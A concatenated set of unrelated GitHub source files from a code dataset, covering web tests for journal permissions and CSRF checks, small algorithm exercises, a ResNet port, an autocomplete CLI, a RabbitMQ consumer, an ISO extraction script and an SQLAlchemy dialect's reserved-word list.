db_utils.create_user(username='journal_test')\n\n\n@pytest.fixture(name='journals')\n@pytest.mark.usefixtures('db', 'journal_user')\ndef _journals(journal_user):\n db_utils.create_journal(journal_user, title=u'Test journal', unixtime=arrow.get(1), content=u'A test journal')\n db_utils.create_journal(journal_user, title=u'Public journal', unixtime=arrow.get(2), content=u'A public journal')\n db_utils.create_journal(journal_user, title=u'Hidden journal', unixtime=arrow.get(3), content=u'A hidden journal', settings=CharSettings({'hidden'}, {}, {}))\n db_utils.create_journal(journal_user, title=u'Restricted journal', rating=ratings.MATURE.code, unixtime=arrow.get(4), content=u'A journal with a non-General rating')\n db_utils.create_journal(journal_user, title=u'Recent journal', unixtime=arrow.get(5), content=u'The most recent journal', settings=CharSettings({'friends-only'}, {}, {}))\n\n\n@pytest.mark.usefixtures('db', 'journal_user')\ndef test_profile_empty(app):\n resp = app.get('/~journal_test')\n assert resp.html.find(id='user-journal') is None\n\n\n@pytest.mark.usefixtures('db', 'journal_user', 'journals')\ndef test_profile_guest(app):\n resp = app.get('/~journal_test')\n assert resp.html.find(id='user-journal').h4.string == u'Public journal'\n\n\n@pytest.mark.usefixtures('db', 'journal_user', 'journals')\ndef test_profile_user(app):\n user = db_utils.create_user(config=CharSettings(frozenset(), {}, {'tagging-level': 'max-rating-mature'}))\n cookie = db_utils.create_session(user)\n\n resp = app.get('/~journal_test', headers={'Cookie': cookie})\n assert resp.html.find(id='user-journal').h4.string == u'Restricted journal'\n\n\n@pytest.mark.usefixtures('db', 'journal_user', 'journals')\ndef test_profile_friend(app, journal_user):\n user = db_utils.create_user()\n cookie = db_utils.create_session(user)\n db_utils.create_friendship(user, journal_user)\n\n resp = app.get('/~journal_test', headers={'Cookie': cookie})\n assert resp.html.find(id='user-journal').h4.string == u'Recent journal'\n\n\n@pytest.mark.usefixtures('db', 'journal_user', 'journals')\ndef test_list_guest(app):\n resp = app.get('/journals/journal_test')\n titles = [link.string for link in resp.html.find(id='journals-content').find_all('a')]\n assert titles == [u'Public journal', u'Test journal']\n\n\n@pytest.mark.usefixtures('db', 'journal_user', 'no_csrf')\ndef test_create(app, journal_user):\n cookie = db_utils.create_session(journal_user)\n\n app.post('/submit/journal', {'title': u'Created journal', 'rating': '10', 'content': u'A journal'}, headers={'Cookie': cookie})\n\n resp = app.get('/~journal_test')\n assert resp.html.find(id='user-journal').h4.string == u'Created journal'\n\n\n@pytest.mark.usefixtures('db', 'journal_user')\ndef test_csrf_on_journal_edit(app, journal_user):\n # Test purpose: Verify that a CSRF token is required to submit a journal entry.\n cookie = db_utils.create_session(journal_user)\n journalid = db_utils.create_journal(journal_user, \"Test\", content=\"Test\")\n\n resp = app.post(\n '/edit/journal',\n {'title': u'Created journal', 'rating': '10', 'content': u'A journal', 'journalid': journalid},\n headers={'Cookie': cookie},\n status=403,\n )\n assert resp.html.find(id='error_content').p.text.startswith(u\"This action appears to have been performed illegitimately\")\n\n\n@pytest.mark.usefixtures('db', 'journal_user')\ndef test_login_required_to_edit_journal(app, journal_user):\n # Test purpose: Verify that an active session is required to even attempt to edit a journal.\n journalid = db_utils.create_journal(journal_user, \"Test\", content=\"Test\")\n\n resp = app.post(\n '/edit/journal',\n {'title': u'Created journal', 'rating': '10', 'content': u'A journal', 'journalid': journalid},\n )\n assert \"You must be signed in to perform this operation.\" in resp.html.find(id='error_content').text\n","repo_name":"kfkitsune/wzl-test","sub_path":"weasyl/test/web/test_journals.py","file_name":"test_journals.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9701295387","text":"\"\"\"\n절단기의 높이 h를 지정하면 줄지어진 떡을 한번에 절단한다.\n높이가 h보다 긴 떡은 h위의 부분이 잘릴 것이고 낮은 떡은 잘리지 않는다.\n19, 14, 10, 17 인 떡을 h=15으로 지정하면 자른 뒤의 떡의 길이는\n15, 14, 10 ,15가 될 것이고, 잘린 떡의 길이는 4,0,0,2 이다.\n이 때 손님은 6만큼 가져갈 수 있다\n\n손님이 왔을 때 요청한 길이가 M 일때 적어도 \nM만큼의 떡을 얻기 위해 절단기에 설정할 수 있는 높의의 최댓값을 구하라\n\"\"\"\n\n#입력\n\"\"\"\n첫 줄에는 떡의 갯수n과 길이 m이 주어진다\n둘째 줄에는 개별 높이가 주어진다.\n\"\"\"\n\n#출력\n\"\"\"\n절단기 높의의 최댓값을 출력한다.\n\"\"\"\n\n#아이디어\n\"\"\"\n0부터 떡의 최대길이까지 범위에서 중간값을 기준으로 잘랐을 때 떡의 길이 합을 보고\n이진탐색으로 m이 나오는 길이를 찾는다.\n\"\"\"\n\n#주의사항\n\"\"\"\n적어도 m만큼의 떡이란 말은 최소 m이다.\n즉, m의 길이 이상을 만족하는 높이 h의 최댓값이다.\n\"\"\"\n\n\n\nn,m = map(int,input().split())\narr = list(map(int,input().split()))\n\ns=0\ne=max(arr)\n\nwhile(smid:\n l+=i-mid\n if l>m:\n s=mid+1\n h=mid\n else:\n e=mid-1\nprint(mid)","repo_name":"qkrtndh/coding_test_python","sub_path":"탐색/이진탐색/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37601805828","text":"from directed_graph import *\n\ndef clone_rec(root,graph,nodes_completed):\n if not root:\n return None\n \n # Creating new vertex/node\n pNew = Node(root.data)\n \n # Using hashmap to keep track of visited nodes\n nodes_completed[root] = pNew\n \n # Adding new vertex in the graph\n graph.add_vertex_in_nodes(pNew)\n \n # Iterate over each neighbor of the current vertex/node\n for p in root.neighbors:\n x = nodes_completed.get(p)\n if not x:\n # If node is not visited call recursive function to create vertex\n pNew.neighbors.append(clone_rec(p,graph,nodes_completed))\n else:\n # If not is visited just add it to neighbors of current vertex\n pNew.neighbors.append(x)\n \n return pNew\n\ndef clone(graph):\n # Hashmap to keep record of visited nodes\n nodes_completed = {}\n\n # Creating new graph\n clone_graph = DirectedGraph()\n\n if not graph.nodes:\n return None\n else:\n clone_rec(graph.nodes[0], clone_graph, nodes_completed)\n\n # return deep copied graph\n return clone_graph\n\n\"\"\"\nSolution\n We use depth-first traversal and create a copy of each node while traversing the graph. \n To avoid getting stuck in cycles, we use a hashtable to store each visited node. And we\n do not revisit nodes that exist in the hashtable. The hashtable key is a node in the \n original graphm and its value is the corresponding node in the cloned graph.\n\n For the above graph, let's assume the root is node 0. So, we'll start with 0.\n\n We will start our traversal from node 0\n We will create a new node 0 and add the\n entry(0,0') in the hashtable\n\n Now we'll move to the first neighbor of 0\n node 2. We'll create a new node 2', and add\n entry (2,2') in hashtable. 2 has only one \n neighbor 0 which is already in hashtable,\n so it will be skipped in this step.\n\n No we'll move on to 2nd neighbor of node 0\n node 3. We'll create a new node 3', and add\n entry (3,3') in hashtable. 3 has only one \n neighbor2 which is already in hashtable, so it will\n be skipped in this step.\n\n No we'll move on to 3rd neighbor of node 0\n node 4. We'll create a new node 4', and add \n entry (4,4') in hashtable. 4 has three neigh-\n -bors {0,1,3}. Nodes 0 and 3 are already in hashtable,\n so they will be skipped. However node 1 is still not \n in hashtable.\n\n Now we'll move to node 1 which is neighbor of 4.\n We'll create a new node 1'. Only neighbor of this\n node is node 2 which is already in hashtable.\n\nTime Complexity\n The time complexity of this solution is linear, O(N).\n\nSpace Complexity\n The space complexity of this solution is linear, O(N) where n is\n the number of vertices in the graph.\n\n **We can have at most n entries in the hash table, so the worst-case\n space complexity is O(N)**\n\n\"\"\"","repo_name":"RicardoTlatelpa/Algorithms-DataStructures","sub_path":"Educative/DataStructures/graphs/Challenges/CloneADG--solution.py","file_name":"CloneADG--solution.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30975138865","text":"# https://deeplearningcourses.com/c/advanced-computer-vision\n# https://www.udemy.com/advanced-computer-vision\nfrom __future__ import print_function, division\nfrom builtins import range, input\n# Note: you may need to update your version of future\n# sudo pip install -U future\n\n\n# Let's go up to the end of the first conv block\n# to make sure everything has been loaded correctly\n# compared to keras\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport keras\n\nfrom keras.applications.resnet50 import ResNet50\nfrom keras.models import Model\nfrom keras.preprocessing import image\nfrom keras.applications.resnet50 import preprocess_input, decode_predictions\n\nfrom tf_resnet_convblock import ConvLayer, BatchNormLayer, ConvBlock\n\n\n# NOTE: dependent on your Keras version\n# this script used 2.1.1\n# [,\n# ,\n# ,\n# ,\n# ,\n# ,\n# ,\n# ,\n# ,\n# ,\n# ,\n# ,\n# ,\n# ,\n# ,\n# ,\n# ]\n\n\n# define some additional layers so they have a forward function\nclass ReLULayer:\n def forward(self, X):\n return tf.nn.relu(X)\n\n def get_params(self):\n return []\n\nclass MaxPoolLayer:\n def __init__(self, dim):\n self.dim = dim\n\n def forward(self, X):\n return tf.nn.max_pool(\n X,\n ksize=[1, self.dim, self.dim, 1],\n strides=[1, 2, 2, 1],\n padding='VALID'\n )\n\n def get_params(self):\n return []\n\nclass PartialResNet:\n def __init__(self):\n self.layers = [\n # before conv block\n ConvLayer(d=7, mi=3, mo=64, stride=2, padding='SAME'),\n BatchNormLayer(64),\n ReLULayer(),\n MaxPoolLayer(dim=3),\n # conv block\n ConvBlock(mi=64, fm_sizes=[64, 64, 256], stride=1),\n ]\n self.input_ = tf.placeholder(tf.float32, shape=(None, 224, 224, 3))\n self.output = self.forward(self.input_)\n\n def copyFromKerasLayers(self, layers):\n self.layers[0].copyFromKerasLayers(layers[1])\n self.layers[1].copyFromKerasLayers(layers[2])\n self.layers[4].copyFromKerasLayers(layers[5:])\n\n def forward(self, X):\n for layer in self.layers:\n X = layer.forward(X)\n return X\n\n def predict(self, X):\n assert(self.session is not None)\n return self.session.run(\n self.output,\n feed_dict={self.input_: X}\n )\n\n def set_session(self, session):\n self.session = session\n self.layers[0].session = session\n self.layers[1].session = session\n self.layers[4].set_session(session)\n\n def get_params(self):\n params = []\n for layer in self.layers:\n params += layer.get_params()\n\n\nif __name__ == '__main__':\n # you can also set weights to None, it doesn't matter\n resnet = ResNet50(weights='imagenet')\n\n # you can determine the correct layer\n # by looking at resnet.layers in the console\n partial_model = Model(\n inputs=resnet.input,\n outputs=resnet.layers[16].output\n )\n print(partial_model.summary())\n # for layer in partial_model.layers:\n # layer.trainable = False\n\n my_partial_resnet = PartialResNet()\n\n # make a fake image\n X = np.random.random((1, 224, 224, 3))\n\n # get keras output\n keras_output = partial_model.predict(X)\n\n # get my model output\n init = tf.variables_initializer(my_partial_resnet.get_params())\n\n # note: starting a new session messes up the Keras model\n session = keras.backend.get_session()\n my_partial_resnet.set_session(session)\n session.run(init)\n\n # first, just make sure we can get any output\n first_output = my_partial_resnet.predict(X)\n print(\"first_output.shape:\", first_output.shape)\n\n # copy params from Keras model\n my_partial_resnet.copyFromKerasLayers(partial_model.layers)\n\n # compare the 2 models\n output = my_partial_resnet.predict(X)\n diff = np.abs(output - keras_output).sum()\n if diff < 1e-10:\n print(\"Everything's great!\")\n else:\n print(\"diff = %s\" % diff)\n","repo_name":"lazyprogrammer/machine_learning_examples","sub_path":"cnn_class2/tf_resnet_first_layers.py","file_name":"tf_resnet_first_layers.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","stars":7794,"dataset":"github-code","pt":"52"} +{"seq_id":"10506175666","text":"from autoCompleteData import AutoCompleteData\nimport string\n\nword_dict = dict()\nfrom initialization import *\n\n\ndef intersection(lst1, lst2):\n lst3 = [value for value in lst1 if value in lst2]\n return lst3\n\n\ndef completed_sentence_change_one_char(input):\n optional_sentence = []\n for i in range(len(input)):\n for char in string.ascii_lowercase:\n if input != input[:i] + char + input[i + 1:]:\n optional_sentence.append({\n 'word': input[:i] + char + input[i + 1:],\n 'index': i\n })\n return optional_sentence\n\n\ndef completed_sentence_delete_one_char(input):\n optional_sentence = []\n for i in range(len(input)):\n if input != (input[:i] + input[i + 1:]):\n optional_sentence.append({\n 'word': input[:i] + input[i + 1:],\n 'index': i\n })\n return optional_sentence\n\n\ndef completed_sentence_add_one_char(input):\n optional_sentence = []\n for i in range(len(input)):\n for char in string.ascii_lowercase:\n if input != input[:i] + char + input[i:]:\n optional_sentence.append({\n 'word': input[:i] + char + input[i:],\n 'index': i\n })\n return optional_sentence\n\n\ndef get_res_of_search(dict, searching, case):\n all_possible_src = []\n searching_words = searching['word'].split(' ')\n if len(searching_words) == 1:\n if dict.words_dict.get(searching_words[0]):\n src_arr = dict.words_trie.search(searching_words[0])\n return [AutoCompleteData(searching['word'], i, case, searching['index']) for i in src_arr]\n for i in range(len(searching_words)):\n if dict.words_dict.get(searching_words[i]):\n trie = dict.words_dict[searching_words[i]]\n if i == len(searching_words) - 1:\n break\n temp = trie.search(searching_words[i + 1])\n if i == 0:\n all_possible_src = temp\n else:\n all_possible_src = intersection(temp, all_possible_src)\n return [AutoCompleteData(searching['word'], i, case, searching['index']) for i in all_possible_src]\n\n\ndef cli():\n dict = StoreData()\n open_file('mini-data')\n while True:\n searching = input('search in google or enter webSite Address:\\n')\n auto_complete_data_arr = get_res_of_search(dict, {'word': searching, 'index': -1}, 'not_changed')\n for i in range(min(len(auto_complete_data_arr), 5)):\n print(auto_complete_data_arr[i])\n if len(auto_complete_data_arr) < 5:\n changed_and_deleted_arr = list()\n changed_arr = completed_sentence_change_one_char(searching)\n deleted_arr = completed_sentence_delete_one_char(searching)\n add_data = completed_sentence_add_one_char(searching)\n for i in range(len(changed_arr)):\n changed_and_deleted_arr += get_res_of_search(dict, changed_arr[i], 'changed')\n for i in range(len(deleted_arr)):\n changed_and_deleted_arr += get_res_of_search(dict, deleted_arr[i], 'delete_one')\n for i in range(len(add_data)):\n changed_and_deleted_arr += get_res_of_search(dict, add_data[i], 'add_one')\n hiest_score_arr = [AutoCompleteData('', (0, ''), '', -1, False)] * 5\n max_score = 0\n for i in range(len(changed_and_deleted_arr)):\n if changed_and_deleted_arr[i].score >= max_score:\n max_score = changed_and_deleted_arr[i].score\n hiest_score_arr = [changed_and_deleted_arr[i]] + hiest_score_arr\n hiest_score_arr.pop()\n for i in range(min(5 - len(auto_complete_data_arr), len(hiest_score_arr))):\n if hiest_score_arr[i].is_real:\n print(hiest_score_arr[i])\n if len(changed_and_deleted_arr) == 0:\n print('not suitable data')\n\n\nif __name__ == '__main__':\n cli()\n","repo_name":"RacheliBlass512/auto-complete","sub_path":"cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4031,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"5732477459","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\ntest_case = int(input())\r\n\r\ndp = [0 for _ in range(101)]\r\ndp[1] = dp[2] = dp[3] = 1\r\ndp[4] = dp[5] = 2\r\n\r\nfor i in range(6, len(dp)):\r\n dp[i] = dp[i-5] + dp[i-1]\r\n\r\nfor _ in range(test_case):\r\n N = int(input())\r\n print(dp[N])","repo_name":"BangDori/python-algorithm","sub_path":"백준/Silver/9461. 파도반 수열/파도반 수열.py","file_name":"파도반 수열.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5888782507","text":"\"\"\"A RabbitMQ consumer\"\"\"\n\nimport asyncio\nfrom asyncio import Event\nimport json\nimport signal\nfrom typing import AsyncIterator, TypeVar\n\nimport aio_pika\n\nT = TypeVar('T')\n\n\nasync def cancellable_aiter(\n async_iterator: AsyncIterator[T],\n cancellation_event: Event\n) -> AsyncIterator[T]:\n \"\"\"Wrap an async iterator such that it exits when the cancellation event is\n set.\n \"\"\"\n cancellation_task = asyncio.create_task(cancellation_event.wait())\n result_iter = async_iterator.__aiter__()\n while not cancellation_event.is_set():\n done, pending = await asyncio.wait(\n [cancellation_task, result_iter.__anext__()],\n return_when=asyncio.FIRST_COMPLETED\n )\n for done_task in done:\n if done_task != cancellation_task:\n # We have a result from the async iterator.\n yield done_task.result()\n else:\n # The cancellation token has been set, and we should exit.\n # Cancel any pending tasks. This is safe as there is no await\n # between the completion of the wait on the cancellation event\n # and the pending tasks being cancelled. This means that the\n # pending tasks cannot have done any work.\n for pending_task in pending:\n pending_task.cancel()\n # Now the tasks are cancelled we can await the cancellation\n # error, knowing they have done no work.\n for pending_task in pending:\n try:\n await pending_task\n except asyncio.CancelledError:\n pass\n\n\nasync def main_async():\n print(\"Press CTRL-C to quit\")\n cancellation_event = Event()\n\n def _signal_handler(*args, **kwargs):\n print('Setting the cancellation event')\n cancellation_event.set()\n\n loop = asyncio.get_event_loop()\n for signal_value in {signal.SIGINT, signal.SIGTERM}:\n loop.add_signal_handler(signal_value, _signal_handler)\n\n url = \"amqp://guest:guest@127.0.0.1/\"\n async with await aio_pika.connect(url) as connection:\n\n channel = await connection.channel()\n queue = await channel.declare_queue('producer', passive=True)\n\n async with queue.iterator() as queue_iter:\n async for message in cancellable_aiter(queue_iter, cancellation_event):\n async with message.process():\n obj = json.loads(message.body.decode())\n print(obj)\n\nif __name__ == '__main__':\n asyncio.run(main_async())\n","repo_name":"rob-blackbourn/example-aio-pkia-cancellation-1","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"3278142804","text":"import utils\nimport torch\n\nimport IPython\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nx = torch.tensor([[1, 5, 6, 4, 3, 9, 5, 2, 0], [1, 8, 7, 3, 4, 5, 6, 7, 2]]).to(device)\ntrg = torch.tensor([[1, 7, 3, 2, 4, 9, 1, 0], [1, 5, 6, 2, 4, 7, 6, 2]]).to(device)\n\nsrc_pad_idx = 0\ntrg_pad_idx = 0\nsrc_vocab_size = 10\ntrg_vocab_size = 10\nmodel = utils.Transformer(src_vocab_size, trg_vocab_size, src_pad_idx, trg_pad_idx).to(\n device\n)\nout = model(x, trg[:, :-1])\n","repo_name":"michaelliangau/ai","sub_path":"projects/pytorch_transformer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17260655202","text":"# 1016번 : 제곱 ㄴㄴ 수\nimport math\n\na, b = map(int, input().split())\n\nsieve = [1 for i in range(a, b+1)]\n\nfor i in range(2, int(b**0.5)+1):\n squres = i**2\n temp = (math.ceil(a/squres) * squres) - a\n while temp <= b-a :\n sieve[temp] = 0\n temp += squres\n\nresult = sum(sieve)\nprint(result)","repo_name":"Gwanghun-Im/BAEKJOON","sub_path":"210212/1016.py","file_name":"1016.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39225271850","text":"# For loops in python\r\n\r\nlist1 = [\"Spiderman\", \"Peter parker\", \"Keerat\", \"Joker\"] # Creating list\r\nfor item in list1:\r\n print(f\"My name is {item}.\")\r\n\r\ndic1 = {\r\n \"Harry\": 1, \"Keerat\": 2\r\n}\r\nfor key, value in dic1.items():\r\n print(f\"{key} have {value} Phone.\")\r\n\r\n# Quiz\r\nlist2 = [\"a\", 11, 2, 3, 4, 12, 23, 134, \"joker\"]\r\nfor i in list2:\r\n if str(i).isnumeric() and i > 6:\r\n print(i)\r\n else:\r\n print(\"Not match\")\r\n","repo_name":"KeertanSingh/PYTHON-PRATICE","sub_path":"learning/forLoops.py","file_name":"forLoops.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75045303204","text":"#! python3\n# coding: utf-8\n\nimport os, os.path\nimport shutil\n\nEXT_TOOL = 'tools/isodump.exe'\nMOD_TOOL = 'tools/psx-mode2-en.exe'\n\nEXT_CMD = '{:s} \"{:s}\" -x \"{:s}\"'\nMOD_CMD = '{:s} \"{:s}\" \\\\{:s} \"{:s}\"'\n\nEXT_TOOL = os.path.abspath(EXT_TOOL)\nMOD_TOOL = os.path.abspath(MOD_TOOL)\n\nclass c_iso_extractor:\n\n def __init__(self, src_fname, ext_path = r'table\\ext', mod_path = None):\n self.src_fname = os.path.abspath(src_fname)\n if not os.path.exists(self.src_fname):\n raise ValueError('src file not exist')\n self.ext_path = os.path.abspath(ext_path)\n if not os.path.exists(self.ext_path):\n os.makedirs(self.ext_path)\n if not mod_path:\n mod_path = ext_path\n self.mod_path = os.path.abspath(mod_path)\n if not os.path.exists(self.mod_path):\n os.makedirs(self.mod_path)\n\n def get_path(self, typ, fname = ''):\n if typ == 'ext':\n path = self.ext_path\n elif typ == 'mod':\n path = self.mod_path\n return os.path.join(path, fname)\n\n def extract(self, tarlist = []):\n for tar in tarlist:\n p = self.get_path('ext', tar)\n if not os.path.exists(p):\n break\n else:\n if len(tarlist) > 0:\n return True\n cmd = EXT_CMD.format(EXT_TOOL, self.src_fname, self.ext_path)\n if os.system(cmd) == 0:\n return True\n else:\n return False\n\n def modify(self, out_fn):\n shutil.copy(self.src_fname, out_fn)\n for fn in os.listdir(self.mod_path):\n cmd = MOD_CMD.format(MOD_TOOL,\n out_fn, fn,\n os.path.join(self.mod_path, fn))\n if os.system(cmd) != 0:\n return False\n return True\n \nif __name__ == '__main__':\n\n iso_file = r'G:\\emu\\ps\\roms\\Tail Concerto (Japan).bin'\n \n extr = c_iso_extractor(iso_file)\n","repo_name":"BSoD123456/psx_modi_for_tc","sub_path":"iso_extractor.py","file_name":"iso_extractor.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"43554565918","text":"import datetime\nfrom telnetlib import BINARY\nfrom . import information_schema as ischema\nfrom sqlalchemy import exc\nfrom sqlalchemy.orm import aliased\nfrom sqlalchemy.engine import default\nfrom sqlalchemy.engine import reflection\nfrom sqlalchemy.sql import compiler\nfrom sqlalchemy.sql import util as sql_util\nfrom sqlalchemy.sql import between\nfrom sqlalchemy.sql import func\nfrom sqlalchemy import sql\nfrom sqlalchemy import util\nfrom sqlalchemy import types as sqltypes\n\nfrom sqlalchemy.types import BIGINT\nfrom sqlalchemy.types import VARCHAR\nfrom sqlalchemy.types import INTEGER\nfrom sqlalchemy.types import BOOLEAN\nfrom sqlalchemy.types import DATE\nfrom sqlalchemy.types import TIMESTAMP\nfrom sqlalchemy.types import TIME\nfrom sqlalchemy.types import NUMERIC\nfrom sqlalchemy.types import FLOAT\nfrom sqlalchemy.types import VARBINARY\nfrom sqlalchemy.types import TEXT\nfrom sqlalchemy.types import SMALLINT\n\nischema_names = {\n \"BIGINT\": BIGINT,\n \"VARCHAR\": VARCHAR,\n \"INTEGER\": INTEGER,\n \"BIT\": BOOLEAN,\n \"DATE\": DATE,\n \"TIMESTAMP\": TIMESTAMP,\n \"NUMERIC\": NUMERIC,\n \"DOUBLE\": FLOAT,\n \"VARBINARY\": BINARY,\n \"LONGVARCHAR\": TEXT,\n \"LONGVARBINARY\": VARBINARY,\n \"TIME\": TIME,\n \"SMALLINT\": SMALLINT,\n \"TINYINT\": SMALLINT,\n}\n\nRESERVED_WORDS = set(\n [\n \"%AFTERHAVING\",\n \"%ALLINDEX\",\n \"%ALPHAUP\",\n \"%ALTER\",\n \"%BEGTRANS\",\n \"%CHECKPRIV\",\n \"%CLASSNAME\",\n \"%CLASSPARAMETER\",\n \"%DBUGFULL\",\n \"%DELDATA\",\n \"%DESCRIPTION\",\n \"%EXACT\",\n \"%EXTERNAL\",\n \"%FILE\",\n \"%FIRSTTABLE\",\n \"%FLATTEN\",\n \"%FOREACH\",\n \"%FULL\",\n \"%ID\",\n \"%IDADDED\",\n \"%IGNOREINDEX\",\n \"%IGNOREINDICES\",\n \"%INLIST\",\n \"%INORDER\",\n \"%INTERNAL\",\n \"%INTEXT\",\n \"%INTRANS\",\n \"%INTRANSACTION\",\n \"%KEY\",\n \"%MATCHES\",\n \"%MCODE\",\n \"%MERGE\",\n \"%MINUS\",\n \"%MVR\",\n \"%NOCHECK\",\n \"%NODELDATA\",\n \"%NOFLATTEN\",\n \"%NOFPLAN\",\n \"%NOINDEX\",\n \"%NOLOCK\",\n \"%NOMERGE\",\n \"%NOPARALLEL\",\n \"%NOREDUCE\",\n \"%NORUNTIME\",\n \"%NOSVSO\",\n \"%NOTOPOPT\",\n \"%NOTRIGGER\",\n \"%NOUNIONOROPT\",\n \"%NUMROWS\",\n \"%ODBCIN\",\n \"%ODBCOUT\",\n \"%PARALLEL\",\n \"%PLUS\",\n \"%PROFILE\",\n \"%PROFILE_ALL\",\n \"%PUBLICROWID\",\n \"%ROUTINE\",\n \"%ROWCOUNT\",\n \"%RUNTIMEIN\",\n \"%RUNTIMEOUT\",\n \"%STARTSWITH\",\n \"%STARTTABLE\",\n \"%SQLSTRING\",\n \"%SQLUPPER\",\n \"%STRING\",\n \"%TABLENAME\",\n \"%TRUNCATE\",\n \"%UPPER\",\n \"%VALUE\",\n \"%VID\",\n \"ABSOLUTE\",\n \"ADD\",\n \"ALL\",\n \"ALLOCATE\",\n \"ALTER\",\n \"AND\",\n \"ANY\",\n \"ARE\",\n \"AS\",\n \"ASC\",\n \"ASSERTION\",\n \"AT\",\n \"AUTHORIZATION\",\n \"AVG\",\n \"BEGIN\",\n \"BETWEEN\",\n \"BIT\",\n \"BIT_LENGTH\",\n \"BOTH\",\n \"BY\",\n \"CASCADE\",\n \"CASE\",\n \"CAST |\",\n \"CHAR\",\n \"CHARACTER\",\n \"CHARACTER_LENGTH\",\n \"CHAR_LENGTH\",\n \"CHECK\",\n \"CLOSE\",\n \"COALESCE\",\n \"COLLATE\",\n \"COMMIT\",\n \"CONNECT\",\n \"CONNECTION\",\n \"CONSTRAINT\",\n \"CONSTRAINTS\",\n \"CONTINUE\",\n \"CONVERT\",\n \"CORRESPONDING\",\n \"COUNT\",\n \"CREATE\",\n \"CROSS\",\n \"CURRENT\",\n \"CURRENT_DATE\",\n \"CURRENT_TIME\",\n \"CURRENT_TIMESTAMP\",\n \"CURRENT_USER\",\n \"CURSOR\",\n \"DATE\",\n \"DEALLOCATE\",\n \"DEC\",\n \"DECIMAL\",\n \"DECLARE\",\n \"DEFAULT\",\n \"DEFERRABLE\",\n \"DEFERRED\",\n \"DELETE\",\n \"DESC\",\n \"DESCRIBE\",\n \"DESCRIPTOR\",\n \"DIAGNOSTICS\",\n \"DISCONNECT\",\n \"DISTINCT\",\n \"DOMAIN\",\n \"DOUBLE\",\n \"DROP\",\n \"ELSE\",\n \"END\",\n \"ENDEXEC\",\n \"ESCAPE\",\n \"EXCEPT\",\n \"EXCEPTION\",\n \"EXEC\",\n \"EXECUTE\",\n \"EXISTS\",\n \"EXTERNAL\",\n \"EXTRACT\",\n \"FALSE\",\n \"FETCH\",\n \"FIRST\",\n \"FLOAT\",\n \"FOR\",\n \"FOREIGN\",\n \"FOUND\",\n \"FROM\",\n \"FULL\",\n \"GET\",\n \"GLOBAL\",\n \"GO\",\n \"GOTO\",\n \"GRANT\",\n \"GROUP\",\n \"HAVING\",\n \"HOUR\",\n \"IDENTITY\",\n \"IMMEDIATE\",\n \"IN\",\n \"INDICATOR\",\n \"INITIALLY\",\n \"INNER\",\n \"INPUT\",\n \"INSENSITIVE\",\n \"INSERT\",\n \"INT\",\n \"INTEGER\",\n \"INTERSECT\",\n \"INTERVAL\",\n \"INTO\",\n \"IS\",\n \"ISOLATION\",\n \"JOIN\",\n \"LANGUAGE\",\n \"LAST\",\n \"LEADING\",\n \"LEFT\",\n \"LEVEL\",\n \"LIKE\",\n \"LOCAL\",\n \"LOWER\",\n \"MATCH\",\n \"MAX\",\n \"MIN\",\n \"MINUTE\",\n \"MODULE\",\n \"NAMES\",\n \"NATIONAL\",\n \"NATURAL\",\n \"NCHAR\",\n \"NEXT\",\n \"NO\",\n \"NOT\",\n \"NULL\",\n \"NULLIF\",\n \"NUMERIC\",\n \"OCTET_LENGTH\",\n \"OF\",\n \"ON\",\n \"ONLY\",\n \"OPEN\",\n \"OPTION\",\n \"OR\",\n \"OUTER\",\n \"OUTPUT\",\n \"OVERLAPS\",\n \"PAD\",\n \"PARTIAL\",\n \"PREPARE\",\n \"PRESERVE\",\n \"PRIMARY\",\n \"PRIOR\",\n \"PRIVILEGES\",\n \"PROCEDURE\",\n \"PUBLIC\",\n \"READ\",\n \"REAL\",\n \"REFERENCES\",\n \"RELATIVE\",\n \"RESTRICT\",\n \"REVOKE\",\n \"RIGHT\",\n \"ROLE\",\n \"ROLLBACK\",\n \"ROWS\",\n \"SCHEMA\",\n \"SCROLL\",\n \"SECOND\",\n \"SECTION\",\n \"SELECT\",\n \"SESSION_USER\",\n \"SET\",\n \"SHARD\",\n \"SMALLINT\",\n \"SOME\",\n \"SPACE\",\n \"SQLERROR\",\n \"SQLSTATE\",\n \"STATISTICS\",\n \"SUBSTRING\",\n \"SUM\",\n \"SYSDATE\",\n \"SYSTEM_USER\",\n \"TABLE\",\n \"TEMPORARY\",\n \"THEN\",\n \"TIME\",\n \"TIMEZONE_HOUR\",\n \"TIMEZONE_MINUTE\",\n \"TO\",\n \"TOP\",\n \"TRAILING\",\n \"TRANSACTION\",\n \"TRIM\",\n \"TRUE\",\n \"UNION\",\n \"UNIQUE\",\n \"UPDATE\",\n \"UPPER\",\n \"USER\",\n \"USING\",\n \"VALUES\",\n \"VARCHAR\",\n \"VARYING\",\n \"WHEN\",\n \"WHENEVER\",\n \"WHERE\",\n 